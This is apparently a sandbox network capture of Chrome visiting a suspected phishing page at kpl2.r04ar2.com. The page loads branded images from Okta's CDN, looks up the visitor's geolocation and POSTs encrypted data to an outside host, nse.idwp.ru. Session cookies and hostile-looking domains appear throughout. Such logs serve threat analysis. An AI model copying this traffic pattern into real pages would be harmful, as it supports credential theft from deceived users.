                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:11 UTC673INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:11 GMT
                                                          Content-Type: image/svg+xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Disposition: inline; filename="klzLXAGm0iHdZcT6MtYiHXXpKNbL5RnuklNxCudj1JkeYERYfD8sQ8Od4hrM5uv220"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zx3Hjrpa9h7ScglhnGTmGxiFfmNX5gQ4jZZrlI7kEwsdUn1IVWfsiylIr%2FMrYXZM%2Bom%2BNq4InumGa5mruNuwe3BxakOFIuj%2B%2F6TUwWI9RNXi6hnyMBqVNQWB8TnliQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f655baf4042e1-EWR
                                                          2024-08-27 22:11:11 UTC696INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                          Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                          2024-08-27 22:11:11 UTC1175INData Raw: 34 32 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70
                                                          Data Ascii: 424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop
                                                          2024-08-27 22:11:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          65192.168.2.449852188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:11 UTC1148OUTGET /ijnd8sg6QezUuY8NkwAQx6Mva2UqiWIRuKitmhbhPvV0dW8953IaxnO5zyk4DAWXKxNh96jT7SddDXEWlab230 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:11 UTC675INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:11 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 1400
                                                          Connection: close
                                                          Content-Disposition: inline; filename="ijnd8sg6QezUuY8NkwAQx6Mva2UqiWIRuKitmhbhPvV0dW8953IaxnO5zyk4DAWXKxNh96jT7SddDXEWlab230"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EDwqe9BL2t9SUpFyWEz9jyQiOSVvfk6AklPsszsIr9sO%2BqsRLjne8mx9xTYgwWpJcFihqdsG0yGgfslrUxty7AEy58Fy1G70znH2RxVLDPP6cpKBda53B7Cdb2Uzng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f655d5e4943b5-EWR
                                                          2024-08-27 22:11:11 UTC694INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                                                          Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
                                                          2024-08-27 22:11:11 UTC706INData Raw: 61 63 00 e3 31 43 e6 07 18 cc 0f 49 f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c 7e 1a e6 61 cc 1d 10 7a 2c bc 49 85 54 87 62 da 50 ea 5e 08 60 ba 07 f2 8d 79 aa 35 38 0b 18 2c 7c 51 fb b7 bc 75 dd ab 2d 84 86 5f 95 97 ff fb 6d 85 31 1c e7 91 f6 7c 6b ac 6a 18 37 05 2c 78 f8 0b c0 96 00 58 f0 f0 17 80 65 7a b0 ef 61 04 8c 8d b4 58 de 00 8a 5c 45 98 24 80 15
                                                          Data Ascii: ac1CIte~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,~az,ITbP^`y58,|Qu-_m1|kj7,xXezaX\E$


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          66192.168.2.449853188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:11 UTC1522OUTGET /opiCvib1OfbhHAtLAPQFkZJXG9XLLMrDTuv80Ycdhp7wkulvQ9LZaUjk5Jb8fief193 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:11 UTC668INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:11 GMT
                                                          Content-Type: image/svg+xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Disposition: inline; filename="opiCvib1OfbhHAtLAPQFkZJXG9XLLMrDTuv80Ycdhp7wkulvQ9LZaUjk5Jb8fief193"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1DtKb9ZYw4QfSZNo3Uh9KTmBu8xOGX0k4bwCQNuyd04F3FA3QsxMCfTFo5KLiq%2FmTD2NEEMesIF2bmIC2kc4AVqz3GW8KkaYDuzLnJGVfS4fXhr10J%2F9OchAOkFoIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f655d3e985e74-EWR
                                                          2024-08-27 22:11:11 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                          Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                          2024-08-27 22:11:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          67192.168.2.449854104.26.1.1004431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:11 UTC350OUTGET /v1/ip/geo.json HTTP/1.1
                                                          Host: get.geojs.io
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:11 UTC917INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:11 GMT
                                                          Content-Type: application/json
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-request-id: d2c5290a8d7cc88b06cf0df722f3844f-ASH
                                                          strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                          access-control-allow-origin: *
                                                          access-control-allow-methods: GET
                                                          pragma: no-cache
                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          geojs-backend: ash-01
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BX%2Fm6rvabCNyt7NLROl%2Fqz6lwfwenGCQq7BEqd%2BhggrLulXu7yOdO7%2B%2B%2BJomUUJ35bAR92RxHlR46KpwMJnwBucxnIVepbrlYqZWN7tbe1us0UnvXvg9fgJPwLLm7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          X-Content-Type-Options: nosniff
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f655eec5f42d7-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:11:11 UTC332INData Raw: 31 34 35 0d 0a 7b 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 30 2e 37 31 32 33 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 34 2e 30 30 36 38 22 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 4c 45 56 45 4c 33 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 33 33 35 36 20 4c 45 56 45 4c 33 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65
                                                          Data Ascii: 145{"area_code":"0","country_code":"US","country_code3":"USA","continent_code":"NA","asn":3356,"region":"New York","latitude":"40.7123","longitude":"-74.0068","ip":"8.46.123.33","organization_name":"LEVEL3","organization":"AS3356 LEVEL3","timezone":"Ame
                                                          2024-08-27 22:11:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          68192.168.2.449857104.21.67.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:11 UTC709OUTPOST /srsldqgbwnlyknaiuilfjcyqoKGYnePGFJAVJGZCNGFCUJYLNOCYUZRFYFVSVVQBpqvHhnoPyzuWRNahuv40 HTTP/1.1
                                                          Host: nse.idwp.ru
                                                          Connection: keep-alive
                                                          Content-Length: 119
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Accept: */*
                                                          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Origin: https://kpl2.r04ar2.com
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://kpl2.r04ar2.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:11 UTC119OUTData Raw: 64 61 74 61 3d 58 56 39 7a 6d 35 63 65 78 32 33 42 54 69 68 68 57 51 41 77 7a 45 53 57 66 46 77 6d 50 45 36 44 53 50 58 54 79 4f 48 35 44 6d 65 4d 4f 6d 59 4b 66 6c 79 76 66 45 4f 74 75 4e 4c 32 36 76 6c 7a 6c 61 37 25 32 42 76 25 32 42 4d 32 76 35 78 63 41 57 31 4c 72 75 69 57 7a 73 6d 46 66 4b 49 31 6e 72 35 53 49 37 73 66 31 65 39 49 52 5a 67 25 33 44
                                                          Data Ascii: data=XV9zm5cex23BTihhWQAwzESWfFwmPE6DSPXTyOH5DmeMOmYKflyvfEOtuNL26vlzla7%2Bv%2BM2v5xcAW1LruiWzsmFfKI1nr5SI7sf1e9IRZg%3D
                                                          2024-08-27 22:11:13 UTC636INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:13 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Content-Length: 384
                                                          Connection: close
                                                          vary: Origin
                                                          access-control-allow-origin: https://kpl2.r04ar2.com
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fLlYnNA5vvOyG9lIFx%2BtybiYM%2BOs0slYDjcq3zEP%2B5FdrTz4FXNzpdCoZhF4fH07u742GvnJWmwwwVogqqvNYYo4VG8Tcjecajpv%2B6c4xRUF0bbxBd6virmyBwrVFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f65603adf4376-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:11:13 UTC384INData Raw: 2b 70 64 4c 71 42 52 79 6f 61 46 67 31 30 67 59 68 2b 51 43 31 35 69 7a 66 30 71 34 34 68 76 4d 4b 55 74 59 57 36 2b 37 75 56 71 6c 31 4e 59 4a 38 61 71 58 66 43 6a 4d 38 42 4c 72 59 4f 6a 63 53 7a 65 33 71 70 69 2b 74 45 7a 43 45 58 41 43 67 2f 53 39 52 62 32 31 35 30 4a 70 48 4c 6c 53 58 43 36 73 34 56 79 30 36 49 55 6a 70 4a 2f 62 62 2f 7a 53 30 62 5a 2f 62 73 39 47 48 72 2b 30 2b 37 48 44 52 78 68 76 39 2f 33 77 41 64 6b 35 58 69 57 52 43 4e 75 4d 62 57 58 7a 44 64 4c 55 32 65 47 71 43 50 59 65 6f 71 6d 71 41 32 39 65 44 6b 66 66 51 31 49 39 77 57 31 42 77 62 70 64 45 56 57 41 35 4e 38 6f 47 6c 46 48 67 62 72 76 6b 66 4b 41 6f 38 70 66 5a 6d 68 56 50 57 52 54 57 55 45 4a 65 69 51 54 79 6f 64 66 38 4d 4f 56 4d 50 79 70 52 78 41 5a 6b 73 4a 62 65 59 67
                                                          Data Ascii: +pdLqBRyoaFg10gYh+QC15izf0q44hvMKUtYW6+7uVql1NYJ8aqXfCjM8BLrYOjcSze3qpi+tEzCEXACg/S9Rb2150JpHLlSXC6s4Vy06IUjpJ/bb/zS0bZ/bs9GHr+0+7HDRxhv9/3wAdk5XiWRCNuMbWXzDdLU2eGqCPYeoqmqA29eDkffQ1I9wW1BwbpdEVWA5N8oGlFHgbrvkfKAo8pfZmhVPWRTWUEJeiQTyodf8MOVMPypRxAZksJbeYg


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          69192.168.2.44985665.9.86.564431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:12 UTC374OUTGET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1
                                                          Host: ok4static.oktacdn.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:11:12 UTC683INHTTP/1.1 200 OK
                                                          Content-Type: image/png
                                                          Content-Length: 10796
                                                          Connection: close
                                                          Date: Mon, 26 Aug 2024 16:07:21 GMT
                                                          Server: nginx
                                                          Last-Modified: Tue, 23 Feb 2021 04:20:08 GMT
                                                          ETag: "12bdacc832185d0367ecc23fd24c86ce"
                                                          Expires: Tue, 26 Aug 2025 16:07:21 GMT
                                                          Cache-Control: max-age=31536000
                                                          Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                          Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                          Access-Control-Allow-Origin: *
                                                          Accept-Ranges: bytes
                                                          X-Cache: Hit from cloudfront
                                                          Via: 1.1 317b3418459e7cb903a13afaecea9340.cloudfront.net (CloudFront)
                                                          X-Amz-Cf-Pop: AMS1-C1
                                                          X-Amz-Cf-Id: pJ3euXlxF7PO3oKT5M97c8LKfwJtlY8vAqEWDvSa0jXTUyy6RPHdOw==
                                                          Age: 108231
                                                          2024-08-27 22:11:12 UTC10796INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a4 00 00 00 5e 08 06 00 00 00 6c 32 60 fe 00 00 29 f3 49 44 41 54 78 da ed 7d 09 9c 1c 55 9d ff a0 8b 20 77 a6 eb bd 1a 42 10 10 50 24 8a 48 76 09 c9 74 d5 ab ea 09 91 b8 a0 78 84 45 41 40 04 51 60 81 45 14 d0 15 02 88 c8 2d ec 8a 9c 22 97 28 e7 9f e5 58 60 89 11 44 2e c3 11 c8 35 5d 5d 55 7d cd 95 c9 9d 90 83 24 33 ff df af aa 26 e9 cc bc d7 67 75 4f 77 cf fb 7d 3e ef 13 98 99 ae 7e f5 8e df f7 77 ff 5a 5a 9a 84 12 7a eb be 96 d6 46 5a 24 49 92 24 49 92 a4 d1 a0 b8 4e fe b3 c7 a4 9d 09 9d ac 74 74 b2 24 65 90 c5 09 4d f9 c5 bc e9 ea ae 72 75 24 49 92 24 49 52 d5 68 81 41 76 4b 30 c5 74 19 b9 77 79 87 3a 98 31 e8 a0 a5 93 c1 44 ce 48 c3 cf d6 4c 53 07 01 98 92 69 46 7e b6 58 8f c4 e0 73 6d 72 f5 24
                                                          Data Ascii: PNGIHDR^l2`)IDATx}U wBP$HvtxEA@Q`E-"(X`D.5]]U}$3&guOw}>~wZZzFZ$I$INtt$eMru$I$IRhAvK0twy:1DHLSiF~Xsmr$


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          70192.168.2.449866188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:12 UTC1108OUTGET /wxHVaG32Jkcs0chiqe2Yu17gtGastmDvkLvL2DuF334122 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
